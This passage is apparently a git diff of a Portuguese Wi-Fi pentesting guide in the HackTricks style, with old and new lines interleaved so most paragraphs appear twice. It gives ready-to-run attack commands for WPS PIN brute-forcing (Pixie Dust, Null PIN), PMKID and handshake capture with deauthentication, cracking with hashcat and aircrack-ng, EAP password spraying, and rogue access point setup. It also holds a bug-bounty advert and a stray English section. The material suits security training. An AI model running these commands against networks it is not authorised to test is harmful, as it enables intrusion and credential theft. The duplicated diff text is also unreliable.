Basicamente, algumas implementações falharam no uso de chaves aleatórias para criptografar as 2 partes do PIN (pois ele é descomposto em 2 partes durante a comunicação de autenticação e enviado ao cliente), então um ataque offline pode ser usado para forçar a descoberta do PIN válido.
```
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
```
### Ataque Null Pin
Algumas implementações muito ruins permitem a conexão com o Null PIN (muito estranho também). O Reaver pode testar isso (o Bully não pode).
Algumas implementações realmente ruins permitem a conexão com o Null PIN (muito estranho também). O Reaver pode testar isso (o Bully não pode).
```
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
```
### Airgeddon
Todos os ataques WPS propostos podem ser facilmente realizados usando o _**airgeddon.**_
Todos os ataques WPS propostos podem ser facilmente realizados usando o _**airgeddon**._
![](<../../.gitbook/assets/image (124).png>)
* 5 e 6 permitem que você tente **seu PIN personalizado** (se você tiver algum)
* 7 e 8 realizam o **ataque Pixie Dust**
* 7 e 8 realizam o ataque **Pixie Dust**
* 13 permite que você teste o **PIN NULL**
* 11 e 12 irão **recolher os PINs relacionados ao AP selecionado de bancos de dados disponíveis** e **gerar** possíveis **PINs** usando: ComputePIN, EasyBox e opcionalmente Arcadyan (recomendado, por que não?)
* 11 e 12 irão **coletar os PINs relacionados ao AP selecionado a partir de bancos de dados disponíveis** e **gerar** possíveis **PINs** usando: ComputePIN, EasyBox e opcionalmente Arcadyan (recomendado, por que não?)
* 9 e 10 testarão **todos os PINs possíveis**
## **WEP**
@ -282,32 +335,39 @@ Tão quebrado e desaparecido que não vou falar sobre isso. Apenas saiba que o _
![](<../../.gitbook/assets/image (125).png>)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novas recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda dos hackers web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
## WPA/WPA2 PSK
### PMKID
Em 2018, os autores do hashcat [divulgaram](https://hashcat.net/forum/thread-7717.html) um novo tipo de ataque que não só depende **de um único pacote**, mas não requer que nenhum cliente esteja conectado ao nosso AP de destino, apenas a comunicação entre o atacante e o AP.
Em 2018, os autores do hashcat [divulgaram](https://hashcat.net/forum/thread-7717.html) um novo tipo de ataque que não apenas depende **de um único pacote**, mas também não requer que nenhum cliente esteja conectado ao nosso AP de destino, apenas a comunicação entre o atacante e o AP.
Acontece que **muitos** roteadores modernos anexam um **campo opcional** no final do **primeiro quadro EAPOL** enviado pelo próprio AP quando alguém está se associando, o chamado `Robust Security Network`, que inclui algo chamado `PMKID`.
Acontece que **muitos** roteadores modernos adicionam um campo **opcional** no final do **primeiro quadro EAPOL** enviado pelo próprio AP quando alguém está se associando, chamado de `Rede de Segurança Robusta`, que inclui algo chamado `PMKID`.
Conforme explicado no post original, o **PMKID** é derivado usando dados que são conhecidos por nós:
Conforme explicado na postagem original, o **PMKID** é derivado usando dados que são conhecidos por nós:
```
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
```
Como a string "PMK Name" é constante e sabemos tanto o BSSID do AP quanto da estação, e o `PMK` é o mesmo obtido a partir de um handshake completo de 4 vias, isso é tudo o que o hashcat precisa para quebrar a PSK e recuperar a senha!\
**Uma vez que a string "PMK Name" é constante, sabemos tanto o BSSID do AP quanto da estação e o `PMK` é o mesmo obtido a partir de um handshake completo de 4 vias**, isso é tudo o que o hashcat precisa para quebrar a PSK e recuperar a senha!\
Descrição obtida [aqui](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/).
Para **coletar** essas informações e **fazer força bruta** localmente na senha, você pode fazer o seguinte:
Para **coletar** essas informações e **fazer força bruta** localmente na senha, você pode fazer:
```bash
airmon-ng check kill
airmon-ng start wlan0
@ -326,10 +386,10 @@ hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
Por favor, note que o formato correto de um hash contém **4 partes**, como: _4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7\*566f6461666f6e65436f6e6e6563743034383131343838_\
__Se o seu hash contém **apenas 3 partes**, então ele é **inválido** (a captura PMKID não foi válida).
Por favor, observe que o formato correto de um hash contém **4 partes**, como: _4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7\*566f6461666f6e65436f6e6e6563743034383131343838_\
\_\_Se o seu hash contém **apenas** **3 partes**, então ele é **inválido** (a captura do PMKID não foi válida).
Observe que o `hcxdumptool` **também captura handshakes** (algo como isso aparecerá: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). Você pode **transformar** os **handshakes** para o formato **hashcat**/**john** usando o `cap2hccapx`.
Observe que o `hcxdumptool` **também captura handshakes** (algo como isso aparecerá: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). Você pode **transformar** os **handshakes** para o formato do **hashcat**/**john** usando o `cap2hccapx`.
```bash
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
@ -337,20 +397,18 @@ hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
```
_Notei que alguns handshakes capturados com essa ferramenta não puderam ser quebrados mesmo sabendo a senha correta. Eu recomendaria capturar handshakes também da maneira tradicional, se possível, ou capturar vários deles usando essa ferramenta._
### Captura de Handshake
Uma maneira de atacar redes **WPA/WPA2** é capturando um **handshake** e tentando **quebrar** a senha usada **offline**. Para fazer isso, você precisa encontrar o **BSSID** e o **canal** da rede da **vítima**, e um **cliente** que esteja conectado à rede.\
Assim que você tiver essas informações, é necessário começar a **escutar** toda a comunicação desse **BSSID** nesse **canal**, porque, com sorte, o handshake será enviado lá:
Uma maneira de atacar redes **WPA/WPA2** é capturar um **handshake** e tentar **quebrar** a senha usada **offline**. Para fazer isso, você precisa encontrar o **BSSID** e o **canal** da rede da **vítima**, e um **cliente** que esteja conectado à rede.\
Uma vez que você tenha essas informações, você precisa começar a **escutar** toda a comunicação desse **BSSID** nesse **canal**, pois esperançosamente o handshake será enviado lá:
```bash
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
```
Agora você precisa **desautenticar** o **cliente** por alguns segundos para que ele se autentique automaticamente novamente no AP (por favor, leia a parte de DoS para encontrar várias maneiras de desautenticar um cliente):
Agora você precisa **desautenticar** o **cliente** por alguns segundos para que ele se autentique novamente automaticamente no AP (por favor, leia a parte sobre DoS para encontrar várias maneiras de desautenticar um cliente):
```bash
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not always work
```
_Nota que, como o cliente foi desautenticado, ele pode tentar se conectar a um AP diferente ou, em outros casos, a uma rede diferente._
_Nota que, como o cliente foi desconectado, ele pode tentar se conectar a um AP diferente ou, em outros casos, a uma rede diferente._
Assim que o `airodump-ng` mostrar algumas informações de handshake, isso significa que o handshake foi capturado e você pode parar de ouvir:
@ -360,15 +418,13 @@ Uma vez que o handshake é capturado, você pode **quebrá-lo** com o `aircrack-
```
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
```
### Verificar se o handshake está no arquivo
### Verificar se há handshake no arquivo
**aircrack**
```bash
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture
```
**tshark**
`tshark` é um utilitário de linha de comando que permite capturar e analisar o tráfego de rede. Ele é uma ferramenta poderosa para a análise de pacotes e pode ser usado para identificar problemas de rede, bem como para fins de segurança, como a detecção de ataques de rede. O `tshark` é uma ferramenta de linha de comando e pode ser executado em sistemas operacionais Windows, Linux e macOS. Ele suporta uma ampla variedade de formatos de arquivo de captura, incluindo o popular formato `pcap`.
**tshark** é uma ferramenta de linha de comando que faz parte do conjunto de ferramentas Wireshark. É usado para capturar e analisar o tráfego de rede em tempo real. O tshark permite visualizar e filtrar pacotes capturados, extraindo informações úteis para análise de segurança e solução de problemas de rede. Ele suporta uma ampla variedade de formatos de captura e pode ser executado em várias plataformas, incluindo Windows, macOS e Linux. O tshark é uma ferramenta poderosa para pentesters e administradores de rede que desejam examinar o tráfego de rede em detalhes.
```bash
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.
```
@ -385,73 +441,72 @@ pyrit -r psk-01.cap analyze
```
## **WPA Enterprise (MGT)**
**É** importante falar sobre os **diferentes métodos de autenticação** que podem ser usados por um Wifi empresarial. Para este tipo de Wifis, você provavelmente encontrará em `airodump-ng` algo como isto:
É importante falar sobre os **diferentes métodos de autenticação** que podem ser usados por uma rede Wi-Fi empresarial. Para esse tipo de Wi-Fi, você provavelmente encontrará algo como isso no `airodump-ng`:
```
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
```
O **EAP** (Extensible Authentication Protocol) é o **cérebro** da **comunicação de autenticação**. Em cima disso, um **algoritmo de autenticação** é usado pelo servidor para autenticar o **cliente** (**suplicante**) e, em alguns casos, pelo cliente para autenticar o servidor.\
**EAP** (Extensible Authentication Protocol) é o **esqueleto** da **comunicação de autenticação**, sobre o qual um algoritmo de autenticação é usado pelo servidor para autenticar o **cliente** (**suplicante**) e, em alguns casos, pelo cliente para autenticar o servidor.\
Os principais algoritmos de autenticação usados nesse caso são:
* **EAP-GTC:** É um método EAP para suportar o uso de tokens de hardware e senhas únicas com EAP-PEAP. Sua implementação é semelhante ao MSCHAPv2, mas não usa um desafio de par. Em vez disso, as senhas são enviadas para o ponto de acesso em **texto simples** (muito interessante para ataques de degradação).
* **EAP-MD-5 (Message Digest)**: O cliente envia o hash MD5 da senha. **Não recomendado**: vulnerável a ataques de dicionário, sem autenticação do servidor e sem maneira de gerar chaves de privacidade equivalentes com fio (WEP) por sessão.
* **EAP-TLS (Transport Layer Security)**: Ele depende de **certificados do lado do cliente e do servidor** para realizar a autenticação e pode ser usado para gerar dinamicamente chaves WEP baseadas em usuário e sessão para proteger comunicações subsequentes.
* **EAP-TTLS (Tunneled Transport Layer Security)**: **Autenticação mútua** do cliente e da rede por meio de um canal (ou túnel) criptografado, bem como um meio para derivar chaves WEP dinâmicas, por usuário e por sessão. Ao contrário do EAP-TLS, **o EAP-TTLS requer apenas certificados do lado do servidor (o cliente usará credenciais)**.
* **EAP-GTC:** É um método EAP para suportar o uso de tokens de hardware e senhas únicas com EAP-PEAP. Sua implementação é semelhante ao MSCHAPv2, mas não usa um desafio entre pares. Em vez disso, as senhas são enviadas para o ponto de acesso em **texto simples** (muito interessante para ataques de degradação).
* **EAP-MD-5 (Message Digest)**: O cliente envia o hash MD5 da senha. **Não recomendado**: Vulnerável a ataques de dicionário, sem autenticação do servidor e sem maneira de gerar chaves de privacidade equivalentes com fio (WEP) por sessão.
* **EAP-TLS (Transport Layer Security)**: Ele depende de **certificados do lado do cliente e do servidor** para realizar a autenticação e pode ser usado para gerar dinamicamente chaves WEP baseadas em usuário e sessão para garantir comunicações subsequentes.
* **EAP-TTLS (Tunneled Transport Layer Security)**: **Autenticação mútua** do cliente e da rede por meio de um canal (ou túnel) criptografado, bem como um meio de derivar chaves WEP dinâmicas por usuário e por sessão. Ao contrário do EAP-TLS, **o EAP-TTLS requer apenas certificados do lado do servidor (o cliente usará credenciais)**.
* **PEAP (Protected Extensible Authentication Protocol)**: O PEAP é como o protocolo **EAP**, mas cria um **túnel TLS** para proteger a comunicação. Em seguida, protocolos de autenticação fracos podem ser usados em cima do EAP, pois eles serão protegidos pelo túnel.
* **PEAP-MSCHAPv2**: Isso também é conhecido como apenas **PEAP** porque é amplamente adotado. Este é apenas o vulnerável desafio/resposta chamado MSCHAPv2 em cima do PEAP (é protegido pelo túnel TLS).
* **PEAP-EAP-TLS ou apenas PEAP-TLS**: É muito semelhante ao **EAP-TLS**, mas um túnel TLS é criado antes que os certificados sejam trocados.
* **PEAP-MSCHAPv2**: Também é conhecido como apenas **PEAP** porque é amplamente adotado. Este é apenas o desafio/resposta vulnerável chamado MSCHAPv2 em cima do PEAP (é protegido pelo túnel TLS).
* **PEAP-EAP-TLS ou apenas PEAP-TLS**: É muito semelhante ao **EAP-TLS**, mas um túnel TLS é criado antes da troca de certificados.
Você pode encontrar mais informações sobre esses métodos de autenticação [aqui](https://en.wikipedia.org/wiki/Extensible\_Authentication\_Protocol) e [aqui](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html).
Você pode encontrar mais informações sobre esses métodos de autenticação [aqui](https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol) e [aqui](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html).
### Captura de nome de usuário
### Captura de Nome de Usuário
Lendo [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27), parece que se você estiver usando **EAP**, as mensagens de **"Identidade"** devem ser **suportadas**, e o **nome de usuário** será enviado em **texto claro** nas mensagens de **"Resposta de Identidade"**.
Mesmo usando um dos métodos de autenticação mais seguros: **PEAP-EAP-TLS**, é possível **capturar o nome de usuário enviado no protocolo EAP**. Para fazer isso, **capture uma comunicação de autenticação** (inicie o `airodump-ng` dentro de um canal e o `wireshark` na mesma interface) e filtre os pacotes por `eapol`.\
Mesmo usando um dos métodos de autenticação mais seguros: **PEAP-EAP-TLS**, é possível **capturar o nome de usuário enviado no protocolo EAP**. Para fazer isso, **capture uma comunicação de autenticação** (inicie o `airodump-ng` em um canal e o `wireshark` na mesma interface) e filtre os pacotes por `eapol`.\
Dentro do pacote "**Resposta, Identidade**", o **nome de usuário** do cliente aparecerá.
![](<../../.gitbook/assets/image (150).png>)
### Identidades anônimas
### Identidades Anônimas
(Informações retiradas de [https://www.interlinknetworks.com/app\_notes/eap-peap.htm](https://www.interlinknetworks.com/app\_notes/eap-peap.htm))
Tanto o **EAP-PEAP** quanto o **EAP-TTLS suportam ocultação de identidade**. Em um ambiente WiFi, o ponto de acesso (AP) geralmente gera uma solicitação de EAP-Identity como parte do processo de associação. Para preservar o anonimato, o cliente EAP no sistema do usuário pode responder com informações suficientes apenas para permitir que o primeiro servidor RADIUS de salto processe a solicitação, como mostrado nos exemplos a seguir.
Tanto o **EAP-PEAP** quanto o **EAP-TTLS** suportam ocultação de identidade. Em um ambiente WiFi, o ponto de acesso (AP) geralmente gera uma solicitação de EAP-Identity como parte do processo de associação. Para preservar o anonimato, o cliente EAP no sistema do usuário pode responder com informações apenas o suficiente para permitir que o servidor RADIUS de primeira etapa processe a solicitação, como mostrado nos exemplos a seguir.
* _**EAP-Identity = anonymous**_
> Neste exemplo, todos os usuários compartilharão o pseudonome de usuário "anonymous". O primeiro servidor RADIUS de salto é um servidor EAP-PEAP ou EAP-TTLS que conduz o final do servidor do protocolo PEAP ou TTLS. O tipo de autenticação interno (protegido) será então tratado localmente ou encaminhado para um servidor RADIUS remoto (doméstico).
> Neste exemplo, todos os usuários compartilharão o pseudonome de usuário "anonymous". O servidor RADIUS de primeira etapa é um servidor EAP-PEAP ou EAP-TTLS que executa o servidor final do protocolo PEAP ou TTLS. O tipo de autenticação interno (protegido) será então tratado localmente ou encaminhado para um servidor RADIUS remoto (doméstico).
* _**EAP-Identity = anonymous@realm\_x**_
> Neste exemplo, os usuários pertencentes a diferentes domínios ocultam sua própria identidade, mas indicam a qual domínio pertencem para que o primeiro servidor RADIUS de salto possa encaminhar as solicitações EAP-PEAP ou EAP-TTLS para servidores RADIUS em seus domínios domésticos, que atuarão como o servidor PEAP ou TTLS. O primeiro servidor de salto age puramente como um nó de relé RADIUS.
> Neste exemplo, os usuários pertencentes a diferentes domínios ocultam sua própria identidade, mas indicam a qual domínio pertencem para que o servidor RADIUS de primeira etapa possa encaminhar as solicitações EAP-PEAP ou EAP-TTLS para servidores RADIUS em seus domínios domésticos, que atuarão como o servidor PEAP ou TTLS. O servidor de primeira etapa atua puramente como um nó de retransmissão RADIUS.
>
> Alternativamente, o primeiro servidor de salto pode atuar como o servidor EAP-PEAP ou EAP-TTLS e processar o método de autenticação protegido ou encaminhá-lo para outro servidor. Essa opção pode ser usada para configurar políticas diferentes para diferentes domínios.
> Alternativamente, o servidor de primeira etapa pode atuar como o servidor EAP-PEAP ou EAP-TTLS e processar o método de autenticação protegido ou encaminhá-lo para outro servidor. Essa opção pode ser usada para configurar políticas diferentes para diferentes domínios.
No EAP-PEAP, uma vez que o servidor PEAP e o cliente PEAP estabelecem o túnel TLS, o servidor PEAP gera uma solicitação de EAP-Identity e a transmite pelo túnel TLS. O cliente responde a esta segunda solicitação de EAP-Identity enviando uma resposta de EAP-Identity contendo a verdadeira identidade do usuário pelo túnel criptografado. Isso impede que qualquer pessoa que esteja interceptando o tráfego 802.11 descubra a verdadeira identidade do usuário.
No EAP-PEAP, uma vez que o servidor PEAP e o cliente PEAP estabelecem o túnel TLS, o servidor PEAP gera uma solicitação de EAP-Identity e a transmite pelo túnel TLS. O cliente responde a essa segunda solicitação de EAP-Identity enviando uma resposta de EAP-Identity contendo a verdadeira identidade do usuário pelo túnel criptografado. Isso impede que qualquer pessoa que esteja interceptando o tráfego 802.11 descubra a verdadeira identidade do usuário.
O EAP-TTLS funciona um pouco diferente. Com o EAP-TTLS, o cliente geralmente se autentica via PAP ou CHAP protegido pelo túnel TLS. Nesse caso, o cliente incluirá um atributo User-Name e um atributo Password ou CHAP-Password na primeira mensagem TLS enviada após o túnel ser estabelecido.
O EAP-TTLS funciona de maneira um pouco diferente. Com o EAP-TTLS, o cliente geralmente se autentica via PAP ou CHAP protegido pelo túnel TLS. Nesse caso, o cliente incluirá um atributo User-Name e um atributo Password ou CHAP-Password na primeira mensagem TLS enviada após o estabelecimento do túnel.
Com qualquer um dos protocolos, o servidor PEAP/TTLS aprende a verdadeira identidade do usuário assim que o túnel TLS for estabelecido. A verdadeira identidade pode estar na forma de _**user@realm**_ ou simplesmente _**user**_. Se o servidor PEAP/TTLS também estiver autenticando o _**usuário**_, ele agora sabe a identidade do usuário e prossegue com o método de autenticação sendo protegido pelo túnel TLS. Alternativamente, o servidor PEAP/TTLS pode encaminhar uma nova solicitação RADIUS para o servidor RADIUS doméstico do usuário. Esta nova solicitação RADIUS tem o protocolo PEAP ou TTLS removido. Se o método de autenticação protegido for EAP, as mensagens EAP internas são transmitidas para o servidor RADIUS doméstico sem a estrutura EAP-PEAP ou EAP-TTLS. O atributo User-Name da mensagem RADIUS de saída contém a verdadeira identidade do usuário - não a identidade anônima do atributo User-Name da solicitação RADIUS de entrada. Se o método de autenticação protegido for PAP ou CHAP (suportado apenas pelo TTLS), o atributo User-Name e outros atributos de autenticação recuperados da carga útil TLS são colocados na mensagem RADIUS de saída no lugar do atributo User-Name anônimo e dos atributos EAP-Message TTLS incluídos na solicitação RADIUS de entrada.
Com qualquer um dos protocolos, o servidor PEAP/TTLS aprende a verdadeira identidade do usuário assim que o túnel TLS for estabelecido. A verdadeira identidade pode estar na forma de _**usuário@domínio**_ ou simplesmente _**usuário**_. Se o servidor PEAP/TTLS também estiver autenticando o _**usuário**_, ele agora sabe a identidade do usuário e prossegue com o método de autenticação protegido pelo túnel TLS. Alternativamente, o servidor PEAP/TTLS pode encaminhar uma nova solicitação RADIUS para o servidor RADIUS doméstico do usuário. Essa nova solicitação RADIUS tem o protocolo PEAP ou TTLS removido. Se o método de autenticação protegido for EAP, as mensagens EAP internas são transmitidas para o servidor RADIUS doméstico sem a estrutura EAP-PEAP ou EAP-TTLS. O atributo User-Name da mensagem RADIUS de saída contém a verdadeira identidade do usuário - não a identidade anônima do atributo User-Name da solicitação RADIUS de entrada. Se o método de autenticação protegido for PAP ou CHAP (suportado apenas pelo TTLS), o atributo User-Name e outros atributos de autenticação recuperados da carga útil TLS são colocados na mensagem RADIUS de saída no lugar do atributo User-Name anônimo e dos atributos TTLS EAP-Message incluídos na solicitação RADIUS de entrada.
### EAP-Bruteforce (ataque de força bruta)
### EAP-Bruteforce (spray de senha)
Se o cliente deve usar um **nome de usuário e senha** (observe que o **EAP-TLS não será válido** neste caso), você pode tentar obter uma **lista** de **nomes de usuário** (veja a próxima parte) e **senhas** e tentar **forçar a entrada** usando o [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer).
Se o cliente deve usar um **nome de usuário e senha** (observe que **EAP-TLS não será válido** neste caso), você pode tentar obter uma **lista** de **nomes de usuários** (veja a próxima parte) e **senhas** e tentar **atacar por força bruta** o acesso usando o [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
```
Você também pode realizar este ataque usando o `eaphammer`:
Você também pode realizar esse ataque usando o `eaphammer`:
```bash
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt
```
## Teoria de ataques ao cliente
## Teoria dos ataques ao cliente
### Seleção de rede e roaming
Embora o protocolo 802.11 tenha regras muito específicas que ditam como uma estação pode se juntar a uma ESS, ele não especifica como a estação deve selecionar uma ESS para se conectar. Além disso, o protocolo permite que as estações se movam livremente entre pontos de acesso que compartilham o mesmo ESSID (porque você não gostaria de perder a conectividade WiFi ao caminhar de uma extremidade de um prédio para outra, etc). No entanto, o protocolo 802.11 não especifica como esses pontos de acesso devem ser selecionados. Além disso, embora as estações devam ser autenticadas na ESS para se associar a um ponto de acesso, o protocolo 802.11 não exige que o ponto de acesso seja autenticado na estação.
Embora o protocolo 802.11 tenha regras muito específicas que ditam como uma estação pode se juntar a uma ESS, ele não especifica como a estação deve selecionar uma ESS para se conectar. Além disso, o protocolo permite que as estações se movam livremente entre pontos de acesso que compartilham o mesmo ESSID (porque você não gostaria de perder a conectividade WiFi ao caminhar de uma extremidade de um prédio para outra, etc). No entanto, o protocolo 802.11 não especifica como esses pontos de acesso devem ser selecionados. Além disso, embora as estações precisem ser autenticadas na ESS para se associarem a um ponto de acesso, o protocolo 802.11 não exige que o ponto de acesso seja autenticado na estação.
### Listas de rede preferidas (PNLs)
@ -459,15 +514,15 @@ Cada vez que uma estação se conecta a uma rede sem fio, o ESSID da rede é arm
### Varredura passiva
Em redes de infraestrutura, os pontos de acesso periodicamente transmitem quadros de beacon para anunciar sua presença e capacidades às estações próximas. Beacons são quadros de transmissão, o que significa que eles são destinados a serem recebidos por todas as estações próximas dentro do alcance. Os beacons incluem informações sobre as taxas suportadas pelo AP, capacidades de criptografia, informações adicionais e, o mais importante, os quadros de beacon contêm o ESSID do AP (desde que a transmissão do ESSID não esteja desativada).
Em redes de infraestrutura, os pontos de acesso periodicamente transmitem quadros de beacon para anunciar sua presença e capacidades às estações próximas. Os beacons são quadros de transmissão, o que significa que eles são destinados a serem recebidos por todas as estações próximas dentro do alcance. Os beacons incluem informações sobre as taxas suportadas pelo AP, capacidades de criptografia, informações adicionais e, o mais importante, os quadros de beacon contêm o ESSID do AP (desde que a transmissão do ESSID não esteja desativada).
Durante a varredura passiva, o dispositivo cliente ouve os quadros de beacon dos pontos de acesso próximos. Se o dispositivo cliente receber um quadro de beacon cujo campo ESSID corresponder a um ESSID da PNL do cliente, o cliente se conectará automaticamente ao ponto de acesso que enviou o quadro de beacon. Então, suponha que queiramos direcionar um dispositivo sem fio que não esteja atualmente conectado a nenhum sem fio. Se soubermos pelo menos uma entrada na PNL desse cliente, podemos forçar o cliente a se conectar a nós simplesmente criando nosso próprio ponto de acesso com o ESSID dessa entrada.
Durante a varredura passiva, o dispositivo cliente ouve os quadros de beacon dos pontos de acesso próximos. Se o dispositivo cliente receber um quadro de beacon cujo campo ESSID corresponda a um ESSID da PNL do cliente, o cliente se conectará automaticamente ao ponto de acesso que enviou o quadro de beacon. Em seguida, suponha que queiramos direcionar um dispositivo sem fio que não esteja atualmente conectado a nenhum wireless. Se soubermos pelo menos uma entrada na PNL desse cliente, podemos forçar o cliente a se conectar a nós simplesmente criando nosso próprio ponto de acesso com o ESSID dessa entrada.
### Sondagem ativa
O segundo algoritmo de seleção de rede usado no 802.11 é conhecido como Sondagem Ativa. Dispositivos clientes que usam sondagem ativa continuamente transmitem quadros de solicitação de sondagem para determinar quais APs estão dentro do alcance, bem como quais são suas capacidades. As solicitações de sondagem vêm em duas formas: direcionadas e de transmissão. As solicitações de sondagem direcionadas são endereçadas a um ESSID específico e são a maneira do cliente verificar se uma rede específica está próxima.
O segundo algoritmo de seleção de rede usado no 802.11 é conhecido como Sondagem Ativa. Dispositivos clientes que usam sondagem ativa transmitem continuamente quadros de solicitação de sondagem para determinar quais APs estão dentro do alcance, bem como quais são suas capacidades. As solicitações de sondagem são enviadas em duas formas: direcionadas e de transmissão. As solicitações de sondagem direcionadas são endereçadas a um ESSID específico e são a maneira do cliente verificar se uma rede específica está próxima.
Os clientes que usam sondagem direcionada enviarão solicitações de sondagem para cada rede em sua PNL. Deve-se notar que a sondagem direcionada é a única maneira de identificar a presença de redes ocultas próximas. As solicitações de sondagem de transmissão funcionam quase exatamente da mesma maneira, mas são enviadas com o campo SSID definido como NULL. Isso endereça a solicitação de sondagem de transmissão a todos os pontos de acesso próximos, permitindo que a estação verifique se alguma de suas redes preferidas está próxima sem revelar o conteúdo de sua PNL.
Clientes que usam sondagem direcionada enviarão solicitações de sondagem para cada rede em sua PNL. Deve-se observar que a sondagem direcionada é a única maneira de identificar a presença de redes ocultas próximas. As solicitações de sondagem de transmissão funcionam quase da mesma maneira, mas são enviadas com o campo SSID definido como NULL. Isso endereça a solicitação de sondagem de transmissão a todos os pontos de acesso próximos, permitindo que a estação verifique se alguma de suas redes preferidas está próxima sem revelar o conteúdo de sua PNL.
## AP simples com redirecionamento para a Internet
@ -491,7 +546,7 @@ log-queries
log-dhcp
listen-address=127.0.0.1
```
Em seguida, **configure IPs** e **rotas**:
Em seguida, **configure os IPs** e **rotas**:
```
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
@ -502,7 +557,11 @@ dnsmasq -C dnsmasq.conf -d
```
### hostapd
O **hostapd** é um daemon do Linux que permite que o dispositivo funcione como um ponto de acesso Wi-Fi. Ele implementa o protocolo de gerenciamento de acesso ao meio (MAC) 802.11 e é usado para autenticar clientes em uma rede sem fio. O **hostapd** pode ser usado para criar uma rede sem fio segura e controlada, permitindo que os testadores de penetração avaliem a segurança da rede sem fio.
O **hostapd** é um daemon que implementa o ponto de acesso Wi-Fi (AP) e o autenticador para redes sem fio. Ele é usado principalmente para criar pontos de acesso Wi-Fi em sistemas Linux.
O hostapd suporta vários métodos de autenticação, como WPA-PSK, WPA-EAP e IEEE 802.1X. Ele também oferece suporte a recursos avançados, como filtragem de endereço MAC, controle de acesso baseado em VLAN e autenticação RADIUS.
O hostapd é uma ferramenta útil para testes de penetração em redes Wi-Fi, pois permite que os testadores simulem um ponto de acesso e realizem ataques de autenticação e criptografia.
```
apt-get install hostapd
```
@ -524,7 +583,7 @@ wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
```
**Interrompa processos irritantes**, defina o **modo monitor**, e **inicie o hostapd**:
**Parar processos irritantes**, definir **modo de monitoramento** e **iniciar o hostapd**:
```
airmon-ng check kill
iwconfig wlan0 mode monitor
@ -532,24 +591,40 @@ ifconfig wlan0 up
hostapd ./hostapd.conf
```
### Encaminhamento e Redirecionamento
Forwarding and redirection are techniques used in network communication to redirect traffic from one destination to another. These techniques are commonly used in the context of pentesting WiFi networks to redirect network traffic to an attacker-controlled device.
#### Forwarding
Forwarding involves redirecting network traffic from one network interface to another. This can be done at the network level or at the application level. Network-level forwarding is typically done using routing tables, where packets are forwarded based on their destination IP address. Application-level forwarding, on the other hand, involves redirecting traffic based on specific protocols or ports.
In the context of WiFi pentesting, forwarding can be used to redirect traffic from a target device to an attacker-controlled device. This allows the attacker to intercept and analyze the network traffic for further exploitation.
#### Redirection
Redirection, on the other hand, involves redirecting traffic from one URL or domain to another. This is commonly done using HTTP status codes, such as 301 (Moved Permanently) or 302 (Found). When a client receives a redirection response, it automatically sends a new request to the redirected URL.
In the context of WiFi pentesting, redirection can be used to trick users into visiting malicious websites or capturing their credentials. By redirecting the traffic from a legitimate website to a malicious one, an attacker can exploit vulnerabilities in the user's browser or network connection.
Both forwarding and redirection are powerful techniques that can be used by attackers to manipulate network traffic and exploit vulnerabilities. As a pentester, it is important to understand these techniques and how to defend against them.
```bash
